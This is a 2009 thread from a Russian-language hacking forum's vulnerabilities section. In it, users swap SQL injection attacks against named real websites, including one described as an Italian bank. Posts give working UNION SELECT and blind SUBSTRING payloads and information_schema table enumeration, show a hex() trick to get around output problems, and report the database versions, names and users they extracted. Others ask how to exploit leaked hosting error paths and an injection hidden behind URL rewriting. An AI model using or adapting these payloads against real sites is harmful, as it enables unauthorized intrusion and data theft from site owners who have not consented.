ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7541  
Старый 10.06.2009, 09:38
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
ttp://www.otoptravel.com/Qua.php?id=1
MsSQL. Не выводятся даные.
 
Ответить с цитированием

  #7542  
Старый 10.06.2009, 13:06
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема....
вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection)

При любом раскладе пишет: The used SELECT statements have a different number of columns


если кто нить подберет,расскажите пожалуйста.

П.С. Сайт итальянского банка.

Последний раз редактировалось jecka3000; 10.06.2009 в 13:16..
 
Ответить с цитированием

  #7543  
Старый 10.06.2009, 13:25
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

jecka3000
скорее всего это слепая скуля...

http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318+AND+SUBSTRING((v ersion()),1,1)=4

Version: 4.1.16-standard
Database:CRM
User:windpress@media
 
Ответить с цитированием

  #7544  
Старый 10.06.2009, 17:37
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Как обойти?

Цитата:
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+CHARACTER_MAXIMUM_LENG TH+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
Вывод норм, как только тейбл нейм так и все
Всего: 64


Тож самое только когда вводишь юзера
Цитата:
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,ve rsion(),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
5.0.67-log
u7749_2
 
Ответить с цитированием

  #7545  
Старый 10.06.2009, 18:13
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

используй hex():
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,he x(user()),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,he x(TABLE_NAME),0x0b)+FROM+information_schema.TABLES +LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
 
Ответить с цитированием

  #7546  
Старый 10.06.2009, 19:34
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

Заметил в хостинге такие ошибки
Цитата:
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55
а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать?
 
Ответить с цитированием

  #7547  
Старый 10.06.2009, 19:34
AngelOfFaith
Новичок
Регистрация: 02.02.2009
Сообщений: 19
Провел на форуме:
278694

Репутация: 9
Отправить сообщение для AngelOfFaith с помощью ICQ
По умолчанию

В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?
 
Ответить с цитированием

  #7548  
Старый 10.06.2009, 19:40
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Цитата:
Flair
Заметил в хостинге такие ошибки
Цитата:
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55

а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать?
Это просто не конектится(подключатся) МускуЛ...........
 
Ответить с цитированием

  #7549  
Старый 11.06.2009, 06:20
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Цитата:
Сообщение от AngelOfFaith  
В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?
Попробуй обратиться к скрипту на прямую art.php?ver=1&nomer=-1[SQL] хотя скорее всего тебя пошлют с NOT FOUND или реврайт на индекс, а так единственая проблемма это пробелы потому как судя по SQL запросу коментить ничего не надо(хотя я больше чем уверен что пременная используеться где то еще в SQL запросе).
 
Ответить с цитированием

  #7550  
Старый 11.06.2009, 15:09
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

есть sql-inj
http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1
количество столбцов - 1
пробую union select
http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1
получаем 1222 - The used SELECT statements have a different number of columns
как такие ситуации можно обойти?

P.s. мускул пятый

http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ